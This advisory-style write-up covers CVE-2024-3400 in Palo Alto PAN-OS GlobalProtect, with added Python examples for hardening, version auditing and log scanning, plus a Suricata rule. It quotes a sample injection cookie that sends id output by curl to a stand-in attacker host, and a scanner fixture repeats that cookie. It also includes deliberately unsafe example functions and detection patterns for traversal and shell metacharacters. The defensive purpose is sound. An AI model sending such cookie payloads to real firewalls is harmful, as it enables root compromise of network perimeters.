Background
Palo Alto Networks PAN-OS is the operating system powering the company’s next-generation firewalls and Panorama network security management platform. GlobalProtect is the VPN/ZTNA component of PAN-OS, providing remote access for enterprise users. PAN-OS firewalls are deployed extensively in enterprise, government, and critical infrastructure environments as the primary network security enforcement point.
CVE-2024-3400 is a CVSS 10.0 command injection vulnerability that Volexity discovered on April 10, 2024 while responding to an intrusion at a customer. It was exploited as a zero-day by a threat actor Volexity tracks as UTA0218 and assesses as likely state-backed, before Palo Alto Networks could issue a patch. The combination of no authentication requirement, a CVSS 10.0 score, and widespread deployment at the perimeter of security-critical networks made it one of the most significant vulnerabilities of 2024.
Technical Mechanism
CVE-2024-3400 resides in the GlobalProtect portal and gateway component of PAN-OS. It is an arbitrary file creation that turns into an OS command injection, rooted in how PAN-OS handles the session ID (the SESSID cookie) of GlobalProtect connections.
When a GlobalProtect client connects, the appliance creates a session and assigns a session ID that is carried in the SESSID cookie. The session handling code uses that value, unsanitised, to build a filesystem path: ../ segments in the cookie therefore place the file wherever the web process can write. A separate component later hands that filename to a shell, so shell metacharacters embedded in the name are evaluated and the attacker's commands execute:
# Malicious session cookie value: the traversal lands the file in the directory the telemetry collector
# sweeps, and the backtick expression in the filename is evaluated when the collector hands it to a shell
SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`curl${IFS}attacker.example/$(id)`
The vulnerability has one configuration prerequisite:
- A GlobalProtect gateway or portal must be configured (Network > GlobalProtect > Gateways, or Network > GlobalProtect > Portals)
Palo Alto Networks' initial advisory listed a second condition, device telemetry enabled, because the telemetry collector is the component that turns the planted filename into a shell command. This caused confusion about scope; a few days later the advisory was updated to state that device telemetry does not need to be enabled for a firewall to be exposed, and disabling telemetry was withdrawn as a mitigation. Any device with GlobalProtect portal or gateway configured on an affected release should be treated as vulnerable.
The exploited code path, as observed in the wild:
- An unauthenticated request (GET or POST) to the GlobalProtect HIP report endpoint /ssl-vpn/hipreport.esp carries an attacker-supplied SESSID cookie
- The session handling code creates a file whose path is derived from the cookie value without sanitisation, so the traversal sequence drops it into /opt/panlogs/tmp/device_telemetry/
- A periodic (cron-driven) telemetry collector script picks up files in that directory and interpolates their names into a shell command
- Shell metacharacters in the filename are evaluated, and the injected command runs as root
Telemetry is the trigger the observed attacks used; per the vendor's later clarification, the underlying flaw is exploitable through other paths when telemetry is off.
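The two defects in that chain, an unsanitised cookie value used as a filename and a filename interpolated into a shell string, are easiest to see side by side. The following is an added example written for this page, not PAN-OS code: the session directory, the .dat suffix, the 32-hex-character ID format and the curl upload command are assumptions for illustration only.

```python
"""Added example: the unsafe session-ID handling the text describes, beside a
hardened form. Paths, the ID format and the upload command are assumptions for
illustration; they are not PAN-OS internals."""
import os
import re

SESSION_DIR = "/var/run/gp_sessions"                        # assumed location
TELEMETRY_URL = "https://telemetry.example.invalid/upload"  # assumed endpoint


# --- the unsafe pattern (what the vulnerable chain looks like) --------------

def vulnerable_session_path(session_id: str) -> str:
    """Cookie value goes straight into the filename: '../' is honoured."""
    return os.path.join(SESSION_DIR, session_id + ".dat")


def vulnerable_telemetry_command(filename: str) -> str:
    """The collector builds one shell string from the filename. Run with
    shell=True (deliberately not done here), backticks or $(...) in the
    name are evaluated by the shell."""
    return f"curl --silent --upload-file {filename} {TELEMETRY_URL}"


def escapes_session_dir(path: str) -> bool:
    """True if the path lands outside SESSION_DIR once '..' is normalised."""
    return not os.path.normpath(path).startswith(SESSION_DIR + os.sep)


# --- hardened form ----------------------------------------------------------

SESSION_ID_RE = re.compile(r"[0-9a-f]{32}")  # assumed ID format: 32 hex chars


def safe_session_path(session_id: str) -> str:
    """Allow-list the ID, then confirm the normalised path is still a direct
    child of SESSION_DIR (defence in depth against a future regex change)."""
    if not SESSION_ID_RE.fullmatch(session_id):
        raise ValueError("session id must be 32 lowercase hex characters")
    path = os.path.normpath(os.path.join(SESSION_DIR, session_id + ".dat"))
    if os.path.dirname(path) != SESSION_DIR:
        raise ValueError("session path escaped the session directory")
    return path


def safe_telemetry_command(filename: str) -> list:
    """argv form: the filename is one argument and is never parsed by a shell."""
    return ["curl", "--silent", "--upload-file", filename, TELEMETRY_URL]


if __name__ == "__main__":
    hostile = "../../../../opt/panlogs/tmp/device_telemetry/minute/x`id`"
    p = vulnerable_session_path(hostile)
    print("unsafe path  :", os.path.normpath(p), "escapes:", escapes_session_dir(p))
    print("unsafe cmd   :", vulnerable_telemetry_command(p))
    try:
        safe_session_path(hostile)
    except ValueError as exc:
        print("hardened     : rejected ->", exc)
    print("hardened cmd :", safe_telemetry_command(safe_session_path("0" * 32)))
```

Note that the argv form alone is not enough: a traversal-only payload would still create a file in the telemetry directory, which is why the allow-list on the ID and the parent-directory check come first.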
Real-World Exploitation Evidence
Volexity discovered this vulnerability while responding to an intrusion at a customer site in April 2024. The threat actor, UTA0218, had been operating on the compromised firewall for approximately two weeks before discovery.
Post-exploitation activity documented by Volexity and Palo Alto Unit 42:
- UPSTYLE backdoor: A Python backdoor installed as a .pth file under the system Python site-packages directory so that it loads with the interpreter. It receives commands through crafted requests to a non-existent URL, which the web server records in its error log; the backdoor parses the error log, runs the command, briefly writes the output into a publicly served CSS file (bootstrap.min.css) for retrieval, then restores both the file and the log to remove traces.
- Firewall configuration exfiltration: Attackers exported the full running configuration of the firewall, including credentials, VPN settings, and routing information.
- Tunnel creation: Attackers created reverse tunnels from the firewall to external attacker infrastructure, providing persistent access through subsequent reboots.
- Internal network pivot: Once established on the firewall, attackers used it to scan internal networks, access Active Directory, and target other high-value internal systems.
- GLIBC exploitation: Some intrusions progressed to exploiting the underlying Linux OS components for additional persistence.
Exploitation attempts from additional actors increased after the advisory and, in particular, after public proof-of-concept code appeared a few days later. The Shadowserver Foundation counted roughly 22,500 internet-exposed PAN-OS GlobalProtect instances in the days after disclosure; that figure is the exposed population, not a count of confirmed compromises.
Impact Assessment
A compromised PAN-OS firewall is among the most severe breach scenarios in enterprise security:
- Root-level code execution: Commands run as root on the firewall OS, providing complete control over the security device.
- Network traffic inspection: Attackers can reconfigure the firewall to decrypt and inspect traffic that would otherwise be protected, including TLS traffic.
- Configuration exfiltration: VPN credentials, routing tables, security policies, and network topology information are all accessible.
- NAT/routing manipulation: Attackers can redirect network traffic to attacker-controlled infrastructure.
- Security control bypass: The device protecting the network becomes the attacker’s tool, allowing arbitrary traffic to traverse network segments.
Affected Versions
| PAN-OS Version | Affected | Fixed Version |
|---|---|---|
| PAN-OS 11.1 | < 11.1.2-h3 | 11.1.2-h3 |
| PAN-OS 11.0 | < 11.0.4-h1 | 11.0.4-h1 |
| PAN-OS 10.2 | < 10.2.9-h1 | 10.2.9-h1 |
| PAN-OS 10.1 and earlier | Not affected | N/A |
Note: Only devices with a GlobalProtect gateway or portal configured are vulnerable. Device telemetry does not need to be enabled. Cloud NGFW, Panorama appliances and Prisma Access are not affected.
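Checking a fleet against this table is error-prone by hand because of the hotfix suffix: 10.2.9 is vulnerable while 10.2.9-h1 is fixed. The following is an added example for this page, not a Palo Alto Networks tool. It encodes only the three first-fixed releases from the table; Palo Alto Networks later published hotfixes for earlier maintenance releases in the same branches, and those must be added to FIXED_RELEASES from the vendor advisory before the check is used on a real inventory (otherwise such devices are reported as vulnerable).

```python
"""Added example: classify a PAN-OS version string against the fix table above.
Only the three first-fixed releases from the table are encoded; hotfixes Palo
Alto Networks later issued for earlier maintenance releases must be added to
FIXED_RELEASES from the advisory before using this on a real inventory."""
import re

# (major, minor, maintenance, hotfix) of each fixed release; hotfix 0 = none
FIXED_RELEASES = {
    (10, 2, 9, 1),
    (11, 0, 4, 1),
    (11, 1, 2, 3),
}
FIRST_AFFECTED_BRANCH = (10, 2)   # 10.1 and earlier are not affected
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?")


def parse_version(text: str) -> tuple:
    """'11.1.2-h3' -> (11, 1, 2, 3); a missing -hN suffix parses as hotfix 0."""
    m = VERSION_RE.fullmatch(text.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def status(text: str) -> str:
    """'not affected', 'fixed', 'vulnerable', or 'unknown' for a branch the
    table does not cover."""
    v = parse_version(text)
    branch = v[:2]
    if branch < FIRST_AFFECTED_BRANCH:
        return "not affected"
    fixes = [f for f in FIXED_RELEASES if f[:2] == branch]
    if not fixes:
        return "unknown"          # branch not in the table; consult the advisory
    if v[2] > max(f[2] for f in fixes):
        return "fixed"            # later maintenance release than any listed fix
    for f in fixes:
        if f[2] == v[2] and v[3] >= f[3]:
            return "fixed"        # same maintenance release, fix hotfix or later
    return "vulnerable"


def audit(inventory: dict) -> dict:
    """hostname -> version in, hostname -> status out for every device that is
    not confirmed fixed (the ones that need action or a closer look)."""
    return {host: status(ver) for host, ver in inventory.items()
            if status(ver) != "fixed"}


if __name__ == "__main__":
    sample = {  # constructed inventory for the example
        "fw-edge-1": "10.2.9-h1",
        "fw-edge-2": "10.2.9",
        "fw-dc-1": "11.1.2-h2",
        "fw-lab": "10.1.11",
        "fw-new": "11.2.0",
    }
    for host, result in audit(sample).items():
        print(f"{host:10s} {sample[host]:10s} {result}")
```

The "unknown" result is deliberate: a branch the table does not list (for instance one released after the advisory) should be looked up rather than silently treated as safe.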
Remediation Steps
- Apply the hotfix releases immediately: Palo Alto Networks released out-of-band hotfixes on April 14, 2024 (10.2.9-h1, 11.0.4-h1, 11.1.2-h3), followed by hotfixes for earlier maintenance releases in the same branches. Apply the one matching your branch and confirm the running version:
show system info | match sw-version
- Verify GlobalProtect exposure: a device is exposed if a GlobalProtect portal or gateway is configured (Network > GlobalProtect > Portals or Gateways). The telemetry state is informational only, since exploitation does not depend on it:
show global-protect-gateway current-user
show deviceconfig setting telemetry
- Do not rely on disabling device telemetry: the initial advisory offered turning off telemetry (Device > Setup > Telemetry) as an interim workaround, then withdrew it once the vendor confirmed the vulnerability is exploitable with telemetry off. An unpatched device should be taken out of the internet-facing path or protected with the Threat Prevention signatures below until it can be updated.
- Threat Prevention signatures: Palo Alto Networks released Threat ID 95187 to block exploitation attempts, later supplemented by 95189 and 95191. With a Threat Prevention subscription, confirm these are set to block in the Vulnerability Protection profile (Objects > Security Profiles > Vulnerability Protection) and that the profile is attached to the security policy covering the GlobalProtect portal and gateway interface.
- Forensic review: on every exposed device, search the GlobalProtect service log for the "failed to unmarshal session" entries whose session ID contains a traversal sequence, using the command Palo Alto Networks published:
grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log
Check for Volexity's UPSTYLE indicators as well. Palo Alto Networks also offered to review a Technical Support File (TSF) through its support channel for customers unsure of their status.
- Rotate all credentials and secrets: treat everything stored in the configuration as compromised if the device was exposed. Palo Alto Networks' follow-up guidance tiers the response by the evidence found, from patching alone where only probing occurred, through resetting the master key and private data, up to a factory reset where interactive command execution was observed.
Detection Guidance
Log sources:
- GlobalProtect service log (gpsvc.log): the indicator Palo Alto Networks published is a "failed to unmarshal session" entry whose session ID contains a traversal sequence:
grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log
- PAN-OS system logs: tail /var/log/pan/pan.log
- GlobalProtect logs in the GUI: Monitor > Logs > GlobalProtect
- Process execution: unusual child processes of the telemetry scripts
Indicators of compromise:
- Unexpected files under /opt/panlogs/tmp/device_telemetry/ (for example wfd/*.sh), the directory the observed exploitation chain drops files into
- UPSTYLE backdoor: /usr/lib/python3.6/site-packages/system.pth, and unexpected changes to /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css, which the backdoor uses to return command output
- Unexpected Python or shell processes spawned by pan_gcd or the telemetry daemons
- Outbound connections from the firewall management interface to non-Palo Alto IPs
- Modifications to /etc/cron.d/ or /var/schedd.conf
- Session IDs containing traversal sequences or shell metacharacters in GlobalProtect logs
Suricata signature (the SESSID value is in the Cookie header, so the pattern must be applied to the http.cookie buffer rather than the URI; the method is left open because the endpoint accepts GET as well as POST):
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"PAN-OS CVE-2024-3400 GlobalProtect SESSID traversal / command injection"; flow:established,to_server; http.uri; content:"/ssl-vpn/hipreport.esp"; http.cookie; content:"SESSID="; pcre:"/SESSID=[^;]*(\.\.\/|[\$\`\|;])/"; classtype:attempted-admin; sid:9000034; rev:2;)
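The log-based indicators above, the gpsvc.log unmarshal failures and SESSID cookies carrying traversal or shell metacharacters, can be checked offline with a small scanner. The following is an added example for this page, not a vendor tool; the log lines it contains are constructed for the example and only approximate the real gpsvc.log and web-request log layout, so the regular expressions key on the "failed to unmarshal session(...)" text and the SESSID= cookie value rather than on a fixed line format.

```python
"""Added example: scan constructed gpsvc.log and web-request log lines for
CVE-2024-3400 indicators (traversal in the session ID, the device_telemetry
drop directory, shell metacharacters, ${IFS}). Log lines are constructed."""
import re
from dataclasses import dataclass, field

UNMARSHAL_RE = re.compile(r"failed to unmarshal session\((?P<sid>[^)]*)\)")
# Cookie value runs to the next '; ' separator, a quote, whitespace or end of line
COOKIE_RE = re.compile(r'SESSID=(?P<sid>.*?)(?:;\s|["\s]|$)')
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")
TELEMETRY_DIR = "opt/panlogs/tmp/device_telemetry/"
SHELL_META = set("`$|;&<>(){}")


@dataclass
class Finding:
    line_no: int
    session_id: str
    reasons: list = field(default_factory=list)


def classify(sid: str) -> list:
    """Reasons a session ID looks like a CVE-2024-3400 payload; empty if benign."""
    reasons = []
    if TRAVERSAL_RE.search(sid):
        reasons.append("path traversal")
    if TELEMETRY_DIR in sid:
        reasons.append("targets device_telemetry directory")
    meta = "".join(sorted(SHELL_META & set(sid)))
    if meta:
        reasons.append("shell metacharacters " + meta)
    if "${IFS}" in sid:
        reasons.append("${IFS} used as whitespace")
    return reasons


def scan(lines) -> list:
    """Return a Finding for every line whose session ID has at least one reason."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = UNMARSHAL_RE.search(line) or COOKIE_RE.search(line)
        if not m:
            continue
        reasons = classify(m.group("sid"))
        if reasons:
            findings.append(Finding(n, m.group("sid"), reasons))
    return findings


SAMPLE_LINES = [
    # 1: benign unmarshal failure for a stale session ID (constructed)
    "2024-04-11 09:12:01 gpsvc: failed to unmarshal session(0123456789abcdef0123456789abcdef)",
    # 2: exploitation probe, the shape the vendor grep matches (constructed)
    "2024-04-11 09:12:44 gpsvc: failed to unmarshal session(../../../../opt/panlogs/tmp/device_telemetry/minute/probe)",
    # 3: web-request log with the injection in the SESSID cookie (constructed)
    '198.51.100.7 "GET /ssl-vpn/hipreport.esp HTTP/1.1" 200 cookie="SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`curl${IFS}203.0.113.5/$(id)`"',
    # 4: ordinary client request with a normal session ID (constructed)
    '203.0.113.9 "POST /ssl-vpn/hipreport.esp HTTP/1.1" 200 cookie="SESSID=0123456789abcdef0123456789abcdef; PAN_SESSION=x"',
    # 5: unrelated service line (constructed)
    "2024-04-11 09:13:00 gpsvc: client 203.0.113.9 connected",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"line {f.line_no}: {f.session_id!r} -> {', '.join(f.reasons)}")
```

A benign unmarshal failure (line 1) produces no finding, which is the same distinction the vendor's grep draws with its `.\/` term; lines 2 and 3 are flagged, the second with the full set of reasons.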
Timeline
| Date | Event |
|---|---|
| March 26, 2024 | Earliest evidence of UTA0218 exploitation (Volexity) |
| April 10, 2024 | Volexity discovers active exploitation during incident response |
| April 12, 2024 | Palo Alto Networks notified; publishes advisory same day |
| April 12, 2024 | CISA adds CVE-2024-3400 to KEV catalogue |
| April 14, 2024 | Palo Alto releases hotfix patches |
| April 15, 2024 | PoC exploits published publicly |
| April 18, 2024 | Shadowserver Foundation reports roughly 22,500 internet-exposed PAN-OS GlobalProtect instances |